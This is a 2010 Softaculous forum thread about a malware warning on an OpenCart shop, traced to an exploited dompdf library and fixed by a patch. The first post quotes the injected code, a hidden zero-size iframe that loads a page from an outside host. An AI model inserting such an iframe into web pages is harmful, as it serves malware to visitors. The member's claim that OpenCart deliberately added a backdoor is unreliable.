Urgent - REMOVE Opencart

You are here: Index > Softaculous Auto Installer > General Support > Topic : Urgent - REMOVE Opencart

Threaded Mode | Print

Urgent - REMOVE Opencart (4 Replies, Read 19374 times)

easyhost	# April 19, 2010, 10:33 pm
Group: Member Post Group: Working Member Posts: 141 Status:	Hi Alons. I suggest that you remove opencart from Softaculous due to that it is used to distribute malware. I got a warning from google on my site http;//bestvalueinks.com which uses opencart and google states the "Suspected injected code is <iframe width=0 height=0 style='display:none' src="http://adsanalytics.net/in.cgi?2"></iframe>" contacted opencart and their reply astounded me "it looks like it was due to a 3rd party library that comes with OpenCart. Not opencart's code" and their solution is Try searching: search.php?keywords=http%3A%2F%2Fadsanalytics.net%2Fin&terms=all&author=&sc=1&sf=all&sr=posts&sk=t&sd=d&st=0&ch=300&t=0&submit=Search so why allow a third party library to places codes to distribute illegal malware ----------------------- Majesty Hosting
IP: --

Urgent - REMOVE Opencart

alons	# April 21, 2010, 6:38 pm \| Post: 1
Group: Administrator Post Group: Super Member Posts: 2280 Status:	Hi, The link http://bestvalueinks.com/ has an SQL error. If you would like to disable the script right away you can do so from the Softaculous Admin Panel -> Software. We will ask the OpenCart team about it and try to clear any such content. Please post the version of OpenCart you installed and any other plugins you installed. ----------------------- For immediate support please email us at our Support email address. PMs sent to any Softaculous Team member or posting in the forums is not the official way to get support. Virtualizor - The Next Generation VPS Panel Webuzo - It is Softaculous Standalone for Enterprises, SMB, Developers. Deploy it on Dedicated Servers, VPS, Virtual Appliances or the Cloud Pinguzo - Server and Domain Monitoring tool PopularFX - Marketplace of WordPress, Drupal, Joomla, Bootstrap themes Remote Installer - Use Softaculous over FTP/FTPS/SFTP
IP: --

Urgent - REMOVE Opencart

easyhost	# April 21, 2010, 7:16 pm \| Post: 2
Group: Member Post Group: Working Member Posts: 141 Status:	Hi Nothing wrong with my site even open cart admitted "it looks like it was due to a 3rd party library that comes with OpenCart. Not opencart's code" a 3rd party library that is placed in the opencart scripting by opencart caused this problem by allows a hacker a backdoor access into opencart installations to place a malware file into your site without your knowledge. this is an offence, which it looks like softaculous are willing to allow a script on their system that distributes malware. Opencart are fully responsible for hacking into users sites. http://forum.opencart.com/viewtopic.php?f=2&t=13519 "3rd Party Library Malware Warning: dompdf What Is it? OpenCart includes a few other 3rd party opensource classes in the core that are NOT coded by the OpenCart team. One of them is a pdf library that allows PDF files to be created on-the-fly called "dompdf". This class was added a while back with plans to use it for PDF Invoices. But it has not been used by the core yet. Recently it seems that a hacker found an exploit in the dompdf code that allows it to access the opencart database and filesystem from within, and inject some code onto your site." so opencart placed this backdoor feature into their system to allow hackers to hack into any of their users sites without the user being aware of this. Quote From : alons April 21, 2010, 6:38 pm Hi, The link http://bestvalueinks.com/ has an SQL error. If you would like to disable the script right away you can do so from the Softaculous Admin Panel -> Software. We will ask the OpenCart team about it and try to clear any such content. Please post the version of OpenCart you installed and any other plugins you installed. Edited by easyhost : April 21, 2010, 10:07 pm ----------------------- Majesty Hosting
IP: --

Urgent - REMOVE Opencart

alons	# April 25, 2010, 7:45 am \| Post: 3
Group: Administrator Post Group: Super Member Posts: 2280 Status:	Hi, We will be releasing a PATCH as per their post. Thanks for reporting the bug. Regards, Alons ----------------------- For immediate support please email us at our Support email address. PMs sent to any Softaculous Team member or posting in the forums is not the official way to get support. Virtualizor - The Next Generation VPS Panel Webuzo - It is Softaculous Standalone for Enterprises, SMB, Developers. Deploy it on Dedicated Servers, VPS, Virtual Appliances or the Cloud Pinguzo - Server and Domain Monitoring tool PopularFX - Marketplace of WordPress, Drupal, Joomla, Bootstrap themes Remote Installer - Use Softaculous over FTP/FTPS/SFTP
IP: --

Urgent - REMOVE Opencart

alons	# April 26, 2010, 6:07 pm \| Post: 4
Group: Administrator Post Group: Super Member Posts: 2280 Status:	Hi, We released a Patch without the vulnerable "DOMPDF" ----------------------- For immediate support please email us at our Support email address. PMs sent to any Softaculous Team member or posting in the forums is not the official way to get support. Virtualizor - The Next Generation VPS Panel Webuzo - It is Softaculous Standalone for Enterprises, SMB, Developers. Deploy it on Dedicated Servers, VPS, Virtual Appliances or the Cloud Pinguzo - Server and Domain Monitoring tool PopularFX - Marketplace of WordPress, Drupal, Joomla, Bootstrap themes Remote Installer - Use Softaculous over FTP/FTPS/SFTP
IP: --

« Previous Next »

Threaded Mode | Print

Jump To :

Users viewing this topic
	1 guests, 0 users.

All times are GMT. The time now is June 20, 2024, 2:23 am.

Powered By AEF 1.0.8 © 2007-2008 Electron Inc.

Queries: 10 | Page Created In:0.034